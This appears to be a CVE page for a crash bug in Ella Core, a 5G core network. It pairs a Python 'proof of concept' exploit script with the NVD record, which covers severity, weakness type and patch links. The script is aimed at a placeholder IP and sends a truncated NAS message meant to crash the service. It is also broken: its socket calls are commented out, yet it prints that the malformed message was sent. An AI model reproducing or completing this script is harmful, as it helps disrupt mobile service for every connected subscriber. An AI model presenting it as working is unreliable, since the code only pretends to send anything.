CVE-2026-33907

import socket # Conceptual Proof of Concept for CVE-2026-33907 # This script demonstrates sending a malformed NAS message to Ella Core. # The message is crafted to trigger a panic by missing required Information Elements (IEs). TARGET_IP = "192.168.1.100" # Replace with actual Ella Core IP TARGET_PORT = 36412 # Example port for NAS/NGAP traffic def craft_malformed_nas(): """ Crafts a NAS Authentication Response message missing critical IEs. In a real scenario, this requires constructing valid 3GPP headers but stripping the mandatory IE payloads. """ # Simplified example: EPS bearer identity + Protocol discriminator + Message Type # This structure is insufficient for the parser, leading to the crash. nas_header = b"\x07\x00" # Missing the actual Authentication Response Parameter IE payload = nas_header return payload def send_exploit(): print(f"[*] Sending exploit to {TARGET_IP}:{TARGET_PORT}...") try: # Note: Real NAS transport uses SCTP. This is a simplified TCP/UDP simulation. # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((TARGET_IP, TARGET_PORT)) payload = craft_malformed_nas() # sock.send(payload) print("[!] Malformed NAS message sent.") print("[!] Check Ella Core logs for panic/service crash.") # sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": send_exploit()

{"cve": {"id": "CVE-2026-33907", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:27.003", "lastModified": "2026-04-20T12:32:36.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ella Core is a 5G core designed for private networks. Versions prior to 1.7.0 panic when processing Authentication Response and Authentication Failure NAS message missing IEs. An attacker able to send crafted NAS messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. Version 1.7.0 added IE presence verification to NAS message handling."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ellanetworks:ella_core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.0", "matchCriteriaId": "9BAD1DBD-ED4B-49AB-A563-C4838F8F8979"}]}]}], "references": [{"url": "https://github.com/ellanetworks/core/commit/52962660e3bd3e23c7e96b0da270ac1e0e705273", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ellanetworks/core/releases/tag/v1.7.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ellanetworks/core/security/advisories/GHSA-55q8-2gwx-29pc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}